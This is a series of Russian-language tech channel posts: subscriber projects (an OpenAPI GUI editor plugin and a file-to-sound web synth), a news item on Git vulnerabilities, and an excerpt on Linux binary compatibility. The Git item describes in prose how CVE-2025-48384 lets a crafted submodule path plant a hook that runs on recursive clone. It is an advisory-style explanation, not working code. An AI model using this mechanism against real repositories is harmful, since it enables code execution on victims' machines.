https://github.com/oisee/zvdb-z80/blob/master/ZVDB-Z80-ABAP.md
Продолжаем четверг!
Автора проекта я знаю давно (к сожалению, только виртуально), со времён подкаста "Цинковый прод" (который сейчас канул в лета), но Антон и тогда, и сейчас весело и с душой делился и делится своим большим опытом (сейчас тут @crossjoin). Короче, Антон красавчик поэтому я с удовольствием даю ему слово.
Слово автору @antonokolelov
---
Привет всем! @rusdacent (респект ему форева) дал мне возможность рассказать о своём плагине (https://plugins.jetbrains.com/plugin/27118-openapi-gui-editor) для редактирования OpenAPI, и вот моя стори.
По жизни я в основном бекендер на Go (в микросервисной архитектуре).
Несколько лет назад мы прикрутили swagger-анннотации к нашему коду и генерили по ним спеку openapi для других команд. Но удовлетворения это не приносило: уродливые аннотации, в которых легко ошибиться, что-то забыть и так далее. У этих аннотаций, по крайней мере для Go, свой какой-то дебильный синтаксис, хуже ямла (хотя казалось бы это невозможно).
Решили мы попробовать делать наоборот, api design first подход, т.е. сделать руками openapi и генерить из него бойлерплейт код, а логику дописывать отдельно. Заодно это давало бы возможность показать кому-то API до самой разработки.
Но, попробовав редактировать ямлы openapi руками, я приуныл. 10-кратная вложенность получается сразу же, даже для довольно простого API, и вот ты уже не понимаешь, что ты редактируешь, плюс эти шизоидные правила ямла, где легко случайно сделать openapi невалидным.
Можно разбивать док на части, а потом собирать, но это какая-то тоже лишняя возня.
Поэтому я решил сделать свой пет проект и заодно заработать на пиво - OpenAPI GUI Editor, (https://plugins.jetbrains.com/plugin/27118-openapi-gui-editor) плагин для продуктов JetBrains. Он позволяет делать OpenAPI с помощью кнопочек и формочек.
Пока что у меня всего два покупателя, но с помощью этого канала я конечно же, стану миллиардером надеюсь, что найдётся еще пара страдальцев типа меня, которые не любят руками шевелить огромные ямлы
---
Четверг, а значит время проектов от подписчиков! 🌝
Тем, кто пропустил, что такое четверговые проекты от подписчиков, можно прочитать тут - /channel/tech_b0lt_Genona/4983
Слово автору @max_alyokhin
---
Всем привет!
Тот кто увлекается экспериментальной музыкой (ну и искусством вообще), тот возможно слышал про т.н. databending (https://en.wikipedia.org/wiki/Databending) — вкратце, это когда мы, к примеру, текстовым редактором открываем картинку, что-то редактируем, сохраняем и получаем глитч-эффекты на этой картинке. Применительно к музыке есть такая вещь как сонификация — когда мы в аудио переводим не-звуковые данные (прагматичный пример — счётчик Гейгера; у NASA есть целая страничка (https://science.nasa.gov/mission/hubble/multimedia/sonifications/) с переводами космических процессов в звук).
Так вот, я запилил очень простое веб-приложение (https://bs.stranno.su/) (веб-синтезатор?) под названием Binary synth, которое переводит в звук любые файлы на компьютере и предоставляет небольшой интерфейс управления этим процессом.
Можно глянуть видео, там что-то в диапазоне от глитча и эмбиента до idm и нойза
https://www.youtube.com/playlist?list=PLMh6ltuZa_igEX-EK9Zp4hp0ES1vey2oa
https://www.youtube.com/watch?v=5LMYiLwfvRg&t=280s
Полное описание и код проекта
https://github.com/MaxAlyokhin/binary-synth
---
ЗЫ К посту я прицепил видео со звучанием LibreOffice_7.6.3_Win_x86-64_helppack_ru.msi
Уязвимости в Git, допускающие выполнение кода при обращении к внешнему репозиторию
https://www.opennet.ru/opennews/art.shtml?num=63552
Самая годная уязвимость из всего списка это CVE-2025-48384
CVE-2025-48384 - уязвимость вызвана тем, что при чтении значений параметров конфигурации Git очищает указанные в конце символы перевода строки (LF) и возврата каретки (CR), но при записи значений в файл конфигурации не выполняет экранирование символа возврата каретки. Атакующий может указать при инициализации субмодуля путь, в конце имени которого указан символ возврата каретки (ФС в unix-подобных ОС позволяют указывать спецсимволы в именах файлов и каталогов).
Очистка символа возврата каретки при чтении конфигурации приведёт к тому, что субмодуль будет извлечён по некорректному пути. Атакующий может разместить по этому некорректному пути символическую ссылку, указывающую на каталог с git hook-ами и разместить в нём обработчик, вызываемый после завершения операции checkout. Выполнение команды "git clone --recursive" над репозиторием с подобным субмодулем приведёт к выполнению кода, указанного злоумышленником.
Огромный пост, я бы сказал что фундаментальный в каком-то смысле, о том сколько проблем есть в этих наших линупсах с двоичной совместимостью
Ужасное состояние двоичной совместимости Linux (и что с ним делать)
https://habr.com/ru/articles/893720/
Linux — невероятно мощная платформа, но выпуск ПО для неё похож на прогулку по минному полю. В отличие от других операционных систем, Linux — это не просто одна система, а хаотическая смесь различных сервисов, библиотек и даже философий.
Это вообще не должно быть проблемой, ведь само ядро Linux сохранило относительно стабильные системные вызовы. Но всё, что находится поверх них, постоянно меняется, ломая совместимость и сильно усложняя выпуск ПО, которое «просто работает». Если вы занимаетесь разработкой под Linux, то целевой для вас становится не одна платформа — вам приходится работать в экосистеме, эволюционировавшей почти без учёта двоичной совместимости.
Вместо этого можно попробовать другой подход: статически скомпоновать всё, что можно. При этом нужно особенно внимательно следить за тем, не встраивает ли зависимость в свою статическую библиотеку другую зависимость. Мы сталкивались со множеством статических библиотек, включающих объектные файлы из других статических библиотек (например, libcurl), но их всё равно приходилось компоновать отдельно. Этой дупликации можно удобным образом избежать благодаря динамическим библиотекам, однако в случае со статическими библиотеками может понадобиться вручную извлечь все объектные файлы из архива и удалить встроенные. Аналогично, среды исполнения компиляторов наподобие libgcc по умолчанию используют динамическую компоновку. Мы рекомендуем использовать -static-libgcc.
В общем случае большинство приложений не выполняют компоновку напрямую с системными библиотеками, а вместо этого загружают те, которые есть на машине пользователя во время исполнения. Поэтому хоть эти библиотеки и считаются системными компонентами, они обычно наряду с libc имеют несколько других системных зависимостей. Именно из-за этого libc, и в частности GLIBC, становится реальным источником проблем совместимости: по сути, это единственный компонент, с которым компоновка выполняется напрямую.
. . .
На наш взгляд, главная проблема GLIBC заключается в том, что она пытается делать слишком многое. Это огромная монолитная система, обрабатывающая всё, от системных вызовов, управления памятью и потоков до динамического компоновщика. Именно из-за такого тесного связывания для апгрейда GLIBC часто нужно апгрейдить всю систему: всё в ней переплетено. Если бы библиотека была разбита на меньшие компоненты, то пользователи могли бы апгрейдить изменившиеся части, а не таскать вместе с ней целую систему.
libcЕсть множество других сложностей, которые мы не рассматривали, а также множество альтернативных возможностей реализации. Главное здесь то, что эти проблемы решаемы, только они требуют существенных изменений архитектуры. Для этого придётся с нуля переосмыслить данный аспект пользовательского пространства Linux, взяв за основной архитектурный принцип двоичную совместимость. Разработчики GLIBC никогда не пытались это сделать всерьёз. Пока кто-нибудь не решит, что с него достаточно, и не примется за устранение проблемы, двоичная совместимость в Linux останется нерешённой проблемой; а мы уверены, что эта проблема стоит того, чтобы её решать.